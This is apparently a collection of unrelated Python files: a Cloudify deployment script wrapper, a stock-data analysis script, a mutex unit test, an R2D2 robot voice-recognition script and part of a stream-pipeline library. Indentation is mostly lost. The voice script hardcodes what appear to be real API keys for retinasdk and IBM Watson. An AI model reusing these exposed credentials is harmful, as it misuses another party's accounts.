if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
def download(child_rel_path, child_abs_path, download_dir):
artifact_downloaded_path = ctx.download_resource(child_abs_path)
new_file = os.path.join(download_dir, child_rel_path)
new_file_dir = os.path.dirname(new_file)
if not os.path.exists(new_file_dir):
os.makedirs(new_file_dir)
os.rename(artifact_downloaded_path, new_file)
ctx.logger.info('Downloaded artifact from path ' + child_abs_path + ', it\'s available now at ' + new_file)
return new_file
def download_artifacts(artifacts, download_dir):
downloaded_artifacts = {}
os.makedirs(download_dir)
for artifact_name, artifact_ref in artifacts.items():
ctx.logger.info('Download artifact ' + artifact_name)
if isinstance(artifact_ref, basestring):
downloaded_artifacts[artifact_name] = download(os.path.basename(artifact_ref), artifact_ref, download_dir)
else:
child_download_dir = os.path.join(download_dir, artifact_name)
for child_path in artifact_ref:
download(child_path['relative_path'], child_path['absolute_path'], child_download_dir)
downloaded_artifacts[artifact_name] = child_download_dir
return downloaded_artifacts
env_map = {}
env_map['NODE'] = ctx.node.id
env_map['INSTANCE'] = ctx.instance.id
env_map['INSTANCES'] = get_instance_list(ctx.node.id)
env_map['HOST'] = get_host_node_name(ctx.instance)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx)
node_artifacts = {
"scripts": [
{
"relative_path": "stopSupp_hss.sh",
"absolute_path": "_a4c_artifact/FileSystem/scripts/scripts/stopSupp_hss.sh"
}
,
{
"relative_path": "startSupp_hss.sh",
"absolute_path": "_a4c_artifact/FileSystem/scripts/scripts/startSupp_hss.sh"
}
,
{
"relative_path": "deleteSupp_hss.sh",
"absolute_path": "_a4c_artifact/FileSystem/scripts/scripts/deleteSupp_hss.sh"
}
,
{
"relative_path": "configureSupp_hss.sh",
"absolute_path": "_a4c_artifact/FileSystem/scripts/scripts/configureSupp_hss.sh"
}
,
{
"relative_path": "relationships/supp_to_volume.sh",
"absolute_path": "_a4c_artifact/FileSystem/scripts/scripts/relationships/supp_to_volume.sh"
}
,
{
"relative_path": "createSupp_hss.sh",
"absolute_path": "_a4c_artifact/FileSystem/scripts/scripts/createSupp_hss.sh"
}
]
}
relationship_artifacts = {
}
artifacts = node_artifacts.copy()
artifacts.update(relationship_artifacts)
download_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'downloads')
env_map.update(download_artifacts(artifacts, download_dir))
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
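# Hypothetical illustration (not part of the generated wrapper, never called here):
# a sketch of the shape parse_output returns for a two-line script output.
def _parse_output_example():
    sample = 'EXPECTED_OUTPUT_STATUS=ok\ndone'
    # -> {'last_output': 'done', 'outputs': {'STATUS': 'ok'}}
    return parse_output(sample)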
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
            ctx.logger.info('Output name: {0} value : {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/FileSystem/tosca.interfaces.node.lifecycle.Standard/configure/configureSupp_hss.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:configure:{0}'.format(k)] = v
ctx.instance.update()
|
MainProcess.py
|
"""
Created on 2017-10-07
@author: Colin
"""
import threading
import datetime
import os
import pandas
import matplotlib.pyplot as plt
import logging.config
import math
from colin.chen.shares import Utils
from colin.chen.shares import DBUtils
from colin.chen.shares import DataAnalysis
'''Logger configuration'''
logging.config.fileConfig('logging.conf')
logger = logging.getLogger(__name__)
'''
Invoke the main routines
'''
SAVE_FILE_PATH='/Users/chenke/Documents/market/'
def checkStockVolumn(begin, end, step, startDate, endDate):
counter = 0
result = []
start = 0
curTotal = end - begin
engine = DBUtils.db_connection()
while begin <= end:
if (begin <= Utils.MAXSZ):
szSpecial = Utils.change_sz_code(begin)
start = szSpecial
else:
start = str(begin)
currentRs = DBUtils.db_read_k_history_inc(start, engine, startDate, endDate)
tmpResult = DataAnalysis.check_by_vols(start, currentRs)
if tmpResult is not None:
result.append(tmpResult)
begin = begin + step
counter = counter + 1
if (counter % 100 == 0):
Utils.print_progess(counter, curTotal)
print(result)
result_frame = pandas.DataFrame(result)
    filename = SAVE_FILE_PATH + 'from ' + startDate + ' to ' + endDate
if os.path.exists(filename):
        result_frame.to_csv(filename, mode='a', header=False)
else:
result_frame.to_csv(filename)
return result
'''
Execution steps
'''
def do_save(begin_date, finish_date):
threads = []
current_date = begin_date
end_date = finish_date
t1 = threading.Thread(target=DBUtils.save_data, args=(Utils.startSH, Utils.MAXSH, Utils.STEP, current_date, end_date))
threads.append(t1)
t2 = threading.Thread(target=DBUtils.save_data, args=(Utils.startSZ, Utils.MAXSZ, Utils.STEP, current_date, end_date))
threads.append(t2)
t3 = threading.Thread(target=DBUtils.save_data, args=(Utils.startCY, Utils.MAXCY, Utils.STEP, current_date, end_date))
threads.append(t3)
for t in threads:
t.start()
# t.join()
'''
Save forward-adjusted (qfq) stock data in batch.
Logic:
STEP 1: fetch all of the basic stock data.
STEP 2: loop over the stock codes (splitting the work across 10 threads) to fetch and save each stock's data.
'''
def do_save_basics_batch():
engine = DBUtils.db_connection()
basic_info_rs = DBUtils.get_stock_basics(engine)
logger.info('get basic info total::::' + str(basic_info_rs.count()))
share_code_list = list(basic_info_rs[u'code'])
# time_to_market_list=list(basic_info_rs[u'timeToMarketNew'])
counter = 0
end = len(share_code_list)
    while counter < end:
threads = []
        '''First thread'''
share_code = share_code_list[counter]
time_to_market = Utils.get_pre_year(Utils.get_current_date())
# time_to_market=time_to_market_list[counter]
logger.debug("prepare to run:::::share_code="+str(share_code)+"time_to_market="+str(time_to_market))
# t1=threading.Thread(target=do_save_basics_pre, args=(share_code,time_to_market))
do_save_basics_pre(share_code,time_to_market)
# threads.append(t1)
# counter=counter+1
# if counter > end:
# logger.info("out of end!!! end="+end+'counter='+counter)
# else:
# '''Second thread'''
# share_code = share_code_list[counter]
# time_to_market = time_to_market_list[counter]
# t2=threading.Thread(target=do_save_basics_pre, args=(share_code,time_to_market))
# threads.append(t2)
#
# counter = counter + 1
# if counter > end:
# logger.info("out of end!!! end=" + end + 'counter=' + counter)
# break
# else:
# '''Third thread'''
# share_code = share_code_list[counter]
# time_to_market = time_to_market_list[counter]
# t3 = threading.Thread(target=do_save_basics_pre, args=(share_code, time_to_market))
# threads.append(t3)
#
# counter = counter + 1
# if counter > end:
# logger.info("out of end!!! end=" + end + 'counter=' + counter)
# break
# else:
# '''Fifth thread'''
# share_code = share_code_list[counter]
# time_to_market = time_to_market_list[counter]
# t5 = threading.Thread(target=do_save_basics_pre, args=(share_code, time_to_market))
# threads.append(t5)
#
#
# counter = counter + 1
# if counter > end:
# logger.info("out of end!!! end=" + end + 'counter=' + counter)
# break
# else:
# '''Sixth thread'''
# share_code = share_code_list[counter]
# time_to_market = time_to_market_list[counter]
# t6 = threading.Thread(target=do_save_basics_pre, args=(share_code, time_to_market))
# threads.append(t6)
#
counter=counter+1
# for t in threads:
# t.start()
# t.join()
'''
Save a stock's forward-adjusted (qfq) price data
'''
def do_save_basics_pre(share_code, time_to_market):
engine = DBUtils.db_connection()
cur_date = Utils.get_current_date()
change_time = time_to_market
while change_time < cur_date:
next_year = Utils.get_next_year(change_time)
        logger.debug('prepare to save the next time range of data... change_time=' + str(change_time) + ', next_year=' + str(next_year))
DBUtils.save_stock_h_data(engine,share_code,change_time,next_year)
change_time = Utils.get_next_day(Utils.get_next_year(change_time))
def save_index(start_date, finish_date):
begin_date = start_date
end_date = finish_date
DBUtils.save_index_data_end_date(begin_date, end_date)
def do_check(start_date, finish_date):
threads = []
current_date = start_date
end_date = finish_date
t1 = threading.Thread(target=checkStockVolumn, args=(Utils.startSH, Utils.MAXSH, Utils.STEP, current_date, end_date))
threads.append(t1)
t2 = threading.Thread(target=checkStockVolumn, args=(Utils.startSZ, Utils.MAXSZ, Utils.STEP, current_date, end_date))
threads.append(t2)
t3 = threading.Thread(target=checkStockVolumn, args=(Utils.startCY, Utils.MAXCY, Utils.STEP, current_date, end_date))
threads.append(t3)
for t in threads:
t.start()
t.join()
def static_change(share_code, start_date, finish_date):
    stock_change = DataAnalysis.static_single_wave(share_code, start_date, finish_date)
market_pro = Utils.check_market(share_code)
market_change = DataAnalysis.static_a_wave(market_pro, start_date, finish_date)
def copy_table():
engine = DBUtils.db_connection()
sql = "select * from shares.k_his_data"
rs = pandas.read_sql_query(sql, engine)
# rsNew=rs.copy()
# rs[u'date']=rsNew[u'date'].map(changeTo)
# print(rs)
rs.to_sql('k_his_data_new', engine, if_exists='append')
def draw_pic(cur_list):
# engine = DBUtils.dbConnection()
# rs = DBUtils.dbReadKIndex("sh", engine)
# close = rs[u'close']
plt.figure("test")
plt.plot(cur_list)
plt.show()
# os.system("pause")
def test(year):
while year < 2005:
quarter = 4
# while quarter <= 4:
logger.info("\n")
logger.info("year:::"+ str(year) + " quarter:::" + str(quarter))
save_share_report(year, quarter)
# quarter = quarter + 1
year = year +1
def save_basics():
engine=DBUtils.db_connection()
DBUtils.save_stock_basics(engine)
'''
Save the financial report data
'''
def save_share_report(year, quarter):
engine = DBUtils.db_connection()
DBUtils.save_share_report(engine, year, quarter)
DBUtils.save_share_report_profit(engine, year, quarter)
DBUtils.save_share_report_operation(engine, year, quarter)
DBUtils.save_share_report_growth(engine, year, quarter)
DBUtils.save_share_report_debt(engine, year, quarter)
DBUtils.save_share_report_cash_flow(engine, year, quarter)
'''
Plot the fundamentals analysis
'''
def get_basic_info_draw(share_code, start_year, end_year, quarter):
rs = DataAnalysis.share_basic_info_analysis(share_code, start_year, end_year, quarter)
year_list = list(rs[u'year'])
cur_ration_list = list(rs[u'currentratio'])
    '''Convert the strings to floats'''
cur_ration_list = list(map(lambda x:float(x), cur_ration_list))
quick_ratio_list = list(rs[u'quickratio'])
quick_ratio_list = list(map(lambda x:float(x), quick_ratio_list))
# x_start = int(year_list[0])
# x_end = int(year_list[-1])
plt.figure("test")
plt.plot(year_list, cur_ration_list, label='current ratio', color='black')
plt.plot(year_list, quick_ratio_list, label='quick ratio', color='red')
# plt.axis([x_start, x_end, 0, 1])
# plt.plot(year_list, cur_ration_list, year_list, quick_ratio_list, linewidth=2)
plt.legend()
plt.show()
print("start working...")
begin_date='2018-02-01'
end_date='2018-04-27'
check_date = '2018-02-01'
# temp_code=Utils.change_sz_code(2016)
# temp_code='002813'
# result=DataAnalysis.market_simulate(50000,temp_code,'2017-08-01','2017-11-01')
# draw_pic(result)
# do_save(begin_date, end_date)
# save_index(begin_date, end_date)
# do_check(check_date, end_date)
# static_change('300365',check_date, end_date)
# save_share_report(2017, 4)
# copyTable()
# saveIndustryIndex()
# drawPic()
# save_basics()
# test(1990)
get_basic_info_draw('300365', 2010,2017,4)
# do_save_basics_batch()
print("finish working...")
#
# code = str('000001')
# saveDataFromNowOn(1, 1, 1, '2017-01-01')
# currentRs = dbRead(code, "2017-09-01")
# currentCode = checkByVolumn(code, currentRs)
# print(currentCode)
# dbRead(str(300134),"2017-10-8")
# dbSave(str(300134),"2017-1-1")
# saveData(300134,300135,1,'2017-1-1')
|
test_error.py
|
import time
from winmutex import WinMutex, WinMutexAbandonedError
from unittest import TestCase
from threading import Thread
class TestError (TestCase):
def test_abandoned_error1 (self):
mutex = WinMutex()
def example ():
mutex.acquire(blocking=True)
thread = Thread(target=example)
thread.start()
thread.join()
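        # The worker thread exited while still holding the mutex, so the OS marks
        # it as abandoned; the next acquire on this handle reports that condition.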
self.assertRaises(WinMutexAbandonedError, mutex.acquire, blocking=True)
mutex.close()
|
voiceRecognition.py
|
"""
This is the final code structure for the R2D2 project
Cornell Cup Robotics, Spring 2019
File Created by Yanchen Zhan '22 (yz366)
"""
########## MAIN FILE STARTS HERE
#hello
### import respective package
import sys
import speech_recognition as sr
import pyaudio
import nltk
nltk.download('vader_lexicon')
nltk.download('punkt')
nltk.download('averaged_perceptron_tagger')
from nltk.sentiment.vader import SentimentIntensityAnalyzer as sid
import simpleaudio as sa
import json
import numpy as np
from gcc_phat import gcc_phat
import math
import client
import socket
import time
from watson_developer_cloud import NaturalLanguageUnderstandingV1
from watson_developer_cloud.natural_language_understanding_v1 \
import Features, EntitiesOptions, KeywordsOptions, SentimentOptions
import retinasdk
#apiKey = "69ba0c10-5e17-11e9-8f72-af685da1b20e"
#apiKey = "f09d0fe0-3223-11e9-bb65-69ed2d3c7927" #FOR DEMO DAY ONLY
apiKey = "433793c0-6793-11e9-8f72-af685da1b20e"
liteClient = retinasdk.LiteClient(apiKey)
import threading
from threading import Lock, Thread
lock = Lock()
lock2 = Lock()
naturalLanguageUnderstanding = NaturalLanguageUnderstandingV1(
version='2018-11-16',
iam_apikey='_wxBEgRMBJ_WzXRWYzlTLYrNp3A0mmYEjKp-UQsdhvap')
HeyR2File = open("HeyR2File.txt", "a+")
setup_bool = False
confirmation_final = 1000
no_clue_final = 999
wakeup_final = 998
sleep_final = 997
move_final = 996
attendance_final = 995
sentiment_value = 0
def chunkify(arr):
acc_total = []
acc_chunk = np.zeros(8192, dtype='int16')
i = 0
for byte in arr:
if (i < 8192):
acc_chunk[i] = byte
i += 1
        else:
            acc_total.append(acc_chunk)
            acc_chunk = np.zeros(8192, dtype='int16')
            # keep the current sample instead of dropping it at each chunk boundary
            acc_chunk[0] = byte
            i = 1
return acc_total
def get_direction(buf):
SOUND_SPEED = 343.2
MIC_DISTANCE_4 = 0.08127
MAX_TDOA_4 = MIC_DISTANCE_4 / float(SOUND_SPEED)
best_guess = None
MIC_GROUP_N = 2
MIC_GROUP = [[0, 2], [1, 3]]
tau = [0] * MIC_GROUP_N
theta = [0] * MIC_GROUP_N
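    # Each orthogonal mic pair yields a time difference of arrival (tau) via GCC-PHAT,
    # converted to an angle with asin(); the pair with the smaller |angle| is trusted
    # and the other pair's sign is used to resolve the front/back ambiguity.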
for i, v in enumerate(MIC_GROUP):
tau[i], _ = gcc_phat(buf[v[0]::4], buf[v[1]::4], fs=16000, max_tau=MAX_TDOA_4, interp=1)
theta[i] = math.asin(tau[i] / MAX_TDOA_4) * 180 / math.pi
if np.abs(theta[0]) < np.abs(theta[1]):
if theta[1] > 0:
best_guess = (theta[0] + 360) % 360
else:
best_guess = (180 - theta[0])
else:
if theta[0] < 0:
best_guess = (theta[1] + 360) % 360
else:
best_guess = (180 - theta[1])
best_guess = (best_guess + 90 + 180) % 360
best_guess = (-best_guess + 120) % 360
return best_guess
def avg_direction(chunks):
acc = 0
i = 0
for chunk in chunks:
direction = get_direction(chunk)
acc += direction
i += 1
return acc/i
"""
listen to user statement in mic
returns spoken words from user OR
returns empty string if source not detected
"""
def listen(r, mic):
with mic as source:
r.adjust_for_ambient_noise(source)
print("\n\n\nYou may begin talking:\n\n\n") #testing
audio = r.listen(source)
byte_data = audio.get_raw_data(16000, 2)
byte_arr = np.fromstring(byte_data, dtype='int16')
chunks = chunkify(byte_arr)
avg_dir = avg_direction(chunks)
print(int(avg_dir))
try:
return r.recognize_google(audio)
except sr.UnknownValueError:
print ("What are you saying?") #testing
return ""
"""
plays respective sound from speakers
based on sentiment analysis value
"""
def react_with_sound (sentiment_value):
print ("about to play sound...")
lead_folder = "/home/pi/r2-tablet_GUI/R2FinalSounds/"
#lead_folder = "/home/yanchen-zhan/Documents/Cornell-Cup/r2-voice_recognition/Final/R2FinalSounds/"
#lead_folder = "C:\PythonProjects\\r2-voice_recognition\Final\R2FinalSounds\\"
sounds = {"confirmation":"R2OK.wav" , "wake up":"R2Awake.wav" , "angry":"R2Angry.wav" , "good":"R2Good.wav" , \
"happy":"R2Happy.wav" , "neutral":"R2Neutral.wav" , "sad":"R2Sad.wav" , \
"sleep":"R2Sleep.wav", "no clue":"R2Confused.wav" , "move":"R2Move.wav" , \
"attendance":"R2Attendance.wav"}
if (sentiment_value == confirmation_final):
play_sound(lead_folder + sounds["confirmation"])
elif (sentiment_value == no_clue_final):
play_sound(lead_folder + sounds["no clue"])
elif (sentiment_value == wakeup_final):
play_sound(lead_folder + sounds["wake up"])
elif (sentiment_value == sleep_final):
play_sound(lead_folder + sounds["sleep"])
elif (sentiment_value == move_final):
play_sound(lead_folder + sounds["move"])
elif (sentiment_value == attendance_final):
play_sound(lead_folder + sounds["attendance"])
elif (sentiment_value < -0.5):
play_sound(lead_folder + sounds["angry"])
elif (sentiment_value < 0):
play_sound(lead_folder + sounds["sad"])
elif (sentiment_value == 0):
play_sound(lead_folder + sounds["neutral"])
elif (sentiment_value > 0.5):
play_sound(lead_folder + sounds["happy"])
else:
play_sound(lead_folder + sounds["good"])
### play sound from speakers
def play_sound(file_name):
wave_obj = sa.WaveObject.from_wave_file(file_name)
play_obj = wave_obj.play()
play_obj.wait_done()
def stop():
print ("emergency invoked")
#start exit procedure here
## begin by creating threads to send poweroff commands to each arduino asynchronously (if feasible)
#t0 = threading.thread(target = shutdown, args = ("",))
#t0.start()
#t0.join()
react_with_sound(sleep_final)
sys.exit()
def wave(methodcnt): # NOTE - INSTANTIATE WITH SPECIAL CASE
global setup_bool
# initial bootup
if (setup_bool == False or methodcnt == False):
setup_bool = True
else:
print ("waving")
react_with_sound(confirmation_final)
return 0
def greet(methodcnt):
global setup_bool
if (setup_bool == False or methodcnt == False):
setup_bool = True
else:
print ("greeting, don't forget to wave")
react_with_sound(confirmation_final)
return 1
# have R2 take attendance
def take_attendance(methodcnt):
global setup_bool
if (setup_bool == False or methodcnt == False):
print ("in if statement")
setup_bool = True
else:
print ("checking in - F.R.")
        react_with_sound(attendance_final)
client.main()
return 2
def grab_item(item, methodcnt):
global setup_bool
if (setup_bool == False or methodcnt == False):
setup_bool = True
if (item == "periscope"):
open_periscope()
elif (item == "nerf" or "gun" in item):
show_guns()
else:
print ("grabbing " + item)
react_with_sound (confirmation_final)
return 3
def spit_info():
print ("info spit")
react_with_sound (confirmation_final)
return 4
def open_periscope():
print ("opening periscope")
react_with_sound (confirmation_final)
return 5
def show_guns():
print ("showing off dem guns...")
react_with_sound (confirmation_final)
return 6
#implement threading in here
#locks implemented to prevent any conflict in data retrieval
def writeToVoice(input):
lock.acquire()
file=open('VoiceRecognitionText.txt','w+')
file.write(input + "\r\n")
file.close()
lock.release()
def writeToSentiment(score):
lock2.acquire()
score1 = str(score)
file=open('SentimentAnalysisOutput.txt','w+')
file.write(score1 + "\r\n")
file.close()
lock2.release()
def sentiment(input):
try:
response = naturalLanguageUnderstanding.analyze(
text=input,
features=Features(
sentiment=SentimentOptions(document=None, targets=None))).get_result()
parsed_json = json.loads(json.dumps(response, indent=2))
sentiment = parsed_json['sentiment']
document = sentiment['document']
score = document['score']
sentiment_value = float(score)
except:
sentiment_value = sid().polarity_scores(input)['compound']
print(sentiment_value)
react_with_sound(sentiment_value)
return 7
def main():
methodcnt = False
#method dispatcher to connect to functions
dispatcher = {'wave1':wave, 'greet1':greet, 'take_attendance1':take_attendance, 'grab_item1':grab_item}
# https://www.reddit.com/r/Python/comments/7udbs1/using_python_dict_to_call_functions_based_on_user/
#test run to see if all r2 functionality working as expected
fndictGreetingsKeys = {"wave", "hello", "hi", "hey", "check", "attendance"}
fndictGetItemsKeys = {"water", "bottle", "stickers", "periscope"} # NEED TO CHECK SPELLING OF PERISCOPE FOR VOICE RECOGNITION
#in formation of dictionaries, all functions being called
fndictGreetings = {"wave":dispatcher['wave1'], "hello":dispatcher['greet1'], "hi":dispatcher['greet1'], "hey":dispatcher['greet1'], "check":dispatcher['take_attendance1'], "attendance":dispatcher['take_attendance1']}
fndictGetItems = {"water":dispatcher['grab_item1'], "bottle":dispatcher['grab_item1'], "stickers":dispatcher['grab_item1'], "periscope":dispatcher['grab_item1'], "nerf":dispatcher['grab_item1'], "guns":dispatcher['grab_item1'], "gun":dispatcher['grab_item1']}
methodcnt = True
### opens microphone instance that takes speech from human to convert to text
r = sr.Recognizer()
mic = sr.Microphone(2)
# tells R2 to wake up
while (True):
#spoken_text = input("enter text here: ")
spoken_text = listen(r, mic)
spoken_text = spoken_text.lower()
print("The following startup phrase was said:\n" + spoken_text + "\n")
with open("HeyR2File.txt", "a") as myfile:
myfile.write(spoken_text)
# R2 unsure of input
if (spoken_text == ""):
print ("What?")
react_with_sound(no_clue_final)
elif ("r2 stop" in spoken_text):
#write(spoken_text)
stop()
elif ("hey r2" in spoken_text):
print ("awake")
react_with_sound(wakeup_final)
break
# R2 waits to hear what user wants - CHANGE PROMPTS HERE
while (True):
spoken = input("enter text here 2: ")
#spoken = simplify_text(listen (r, mic))
#spoken = spoken.lower()
print("The following text was said:\n" + spoken + "\n")
if ("r2 stop" in spoken):
#write(spoken_text)
stop()
# R2 unsure of input
elif (spoken == ""):
print ("What?")
react_with_sound(no_clue_final)
else:
#use NLTK to determine part of speech of first word spoken
tokens = nltk.word_tokenize (spoken)
tagged = nltk.pos_tag(tokens)
print (tagged[0])
keywords = liteClient.getKeywords(spoken)
#if question desired about Cornell Cup
if ("cup" in keywords and "cornell" in keywords or "competition" in keywords):
spit_info()
#run through commands first
elif ("VB" in tagged[0] or "JJ" in tagged[0]):
if ("high five" in spoken):
keywords.append("high five")
if "wave" in keywords:
                    wave(methodcnt)
break
else:
for x in range(0, len(keywords)):
word = keywords[x]
print (word)
react_with_sound (confirmation_final)
if (word in fndictGreetingsKeys):
print(fndictGreetings[word](methodcnt))
print ("in fndictGreetingKeys")
break
elif (word in fndictGetItemsKeys):
print(fndictGetItems[word](word, methodcnt))
print ("in fndictGetItemsKey")
break
else:
#sentiment analysis
try:
global sentiment_value
response = naturalLanguageUnderstanding.analyze(
text=spoken,
features=Features(
sentiment=SentimentOptions(document=None, targets=None))).get_result()
parsed_json = json.loads(json.dumps(response, indent=2))
sentiment = parsed_json['sentiment']
document = sentiment['document']
score = document['score']
sentiment_value = float(score)
except:
sentiment_value = sid().polarity_scores(spoken)['compound']
print(sentiment_value)
react_with_sound(sentiment_value)
t1 = threading.Thread(target = writeToVoice, args=(spoken,))
t2 = threading.Thread(target = writeToSentiment, args=(sentiment_value,))
t1.start()
t2.start()
t1.join()
t2.join()
main()
|
stream.py
|
"""Lazily-evaluated, parallelizable pipeline.
Overview
========
Streams are iterables with a pipelining mechanism to enable
data-flow programming and easy parallelization.
The idea is to take the output of a function that turns an iterable into
another iterable and plug that as the input of another such function.
While you can already do this using function composition, this package
provides an elegant notation for it by overloading the '>>' operator.
This approach focuses the programming on processing streams of data, step
by step. A pipeline usually starts with a producer, then passes through
a number of filters. Multiple streams can be branched and combined.
Finally, the output is fed to an accumulator, which can be any function
of one iterable argument.
Producers: anything iterable
+ from this module: seq, gseq, repeatcall, chaincall
Filters:
+ by index: take, drop, takei, dropi
+ by condition: filter, takewhile, dropwhile
+ by transformation: apply, map, fold
+ by combining streams: prepend, tee
+ for special purpose: chop, cut, flatten
Accumulators: item, maximum, minimum, reduce
+ from Python: list, sum, dict, max, min ...
Values are computed only when an accumulator forces some or all evaluation
(not when the streams are set up).
Parallelization
===============
All parts of a pipeline can be parallelized using multiple threads or processes.
When a producer is doing blocking I/O, it is possible to use a ThreadedFeeder
or ForkedFeeder to improve performance. The feeder will start a thread or a
process to run the producer and feed generated items back to the pipeline, thus
minimizing the time that the whole pipeline has to wait when the producer is
blocking in system calls.
If the order of processing does not matter, a ThreadPool or ProcessPool
can be used. They both utilize a number of workers in other threads
or processes to work on items pulled from the input stream. Their outputs
are simply iterables represented by the pool objects, which can be used in
pipelines. Alternatively, an Executor can perform fine-grained, concurrent job
control over a thread/process pool.
Multiple streams can be piped to a single PCollector or QCollector, which
will gather generated items whenever they are available. PCollectors
can collect from ForkedFeeder's or ProcessPool's (via system pipes) and
QCollector's can collect from ThreadedFeeder's and ThreadPool's (via queues).
PSorter and QSorter are also collectors, but given multiple sorted input
streams (low to high), a Sorter will output items in sorted order.
Using multiple Feeder's and Collector's, one can implement many parallel
processing patterns: fan-in, fan-out, many-to-many map-reduce, etc.
Articles
========
Articles written about this module by the author can be retrieved from
<http://blog.onideas.ws/tag/project:stream.py>.
"""
import builtins
import copy
import collections
import heapq
import itertools
import operator
import queue
import re
import select
import sys
import threading
import time
from operator import itemgetter, attrgetter
try:
import multiprocessing
import multiprocessing.queues
_nCPU = multiprocessing.cpu_count()
except ImportError:
_nCPU = 1
try:
Iterable = collections.Iterable
except AttributeError:
Iterable = object
try:
from operator import methodcaller
except ImportError:
def methodcaller(methodname, *args, **kwargs):
return lambda o: getattr(o, methodname)(*args, **kwargs)
__version__ = '0.8'
#_____________________________________________________________________
# Base class
class BrokenPipe(Exception):
pass
class Stream(Iterable):
"""A stream is both a lazy list and an iterator-processing function.
The lazy list is represented by the attribute 'iterator'.
The iterator-processing function is represented by the method
__call__(iterator), which should return a new iterator
representing the output of the Stream.
By default, __call__(iterator) chains iterator with self.iterator,
appending itself to the input stream in effect.
__pipe__(inpipe) defines the connection mechanism between Stream objects.
By default, it replaces self.iterator with the iterator returned by
__call__(iter(inpipe)).
A Stream subclass will usually implement __call__, unless it is an
accumulator and will not return a Stream, in which case it will need to
implement __pipe__.
    The `>>` operator works as follows: the expression `a >> b` means
`b.__pipe__(a) if hasattr(b, '__pipe__') else b(a)`.
>>> [1, 2, 3] >> Stream([4, 5, 6]) >> list
[1, 2, 3, 4, 5, 6]
"""
def __init__(self, iterable=None):
"""Make a Stream object from an iterable."""
self.iterator = iter(iterable if iterable else [])
def __iter__(self):
return self.iterator
def __call__(self, iterator):
"""Append to the end of iterator."""
return itertools.chain(iterator, self.iterator)
def __pipe__(self, inpipe):
self.iterator = self.__call__(iter(inpipe))
return self
@staticmethod
def pipe(inpipe, outpipe):
"""Connect inpipe and outpipe. If outpipe is not a Stream instance,
        it should be a function callable on an iterable.
"""
if hasattr(outpipe, '__pipe__'):
return outpipe.__pipe__(inpipe)
elif hasattr(outpipe, '__call__'):
return outpipe(inpipe)
else:
raise BrokenPipe('No connection mechanism defined')
def __rshift__(self, outpipe):
return Stream.pipe(self, outpipe)
def __rrshift__(self, inpipe):
return Stream.pipe(inpipe, self)
def extend(self, outpipe):
"""Similar to __pipe__, except that outpipe must be a Stream, in
which case self.iterator will be modified in-place by calling
outpipe.__call__ on it.
"""
self.iterator = outpipe.__call__(self.iterator)
return self
def __repr__(self):
return 'Stream(%s)' % repr(self.iterator)
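# Illustrative sketch (not part of the original API): a minimal custom processor
# only needs to override __call__ to transform the incoming iterator.
class _double(Stream):
    """Multiply every element of the input stream by two.

    >>> range(5) >> _double() >> list
    [0, 2, 4, 6, 8]
    """
    def __call__(self, iterator):
        return (2 * x for x in iterator)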
#_______________________________________________________________________
# Process streams by element indices
class take(Stream):
"""Take the firts n items of the input stream, return a Stream.
>>> seq(1, 2) >> take(10)
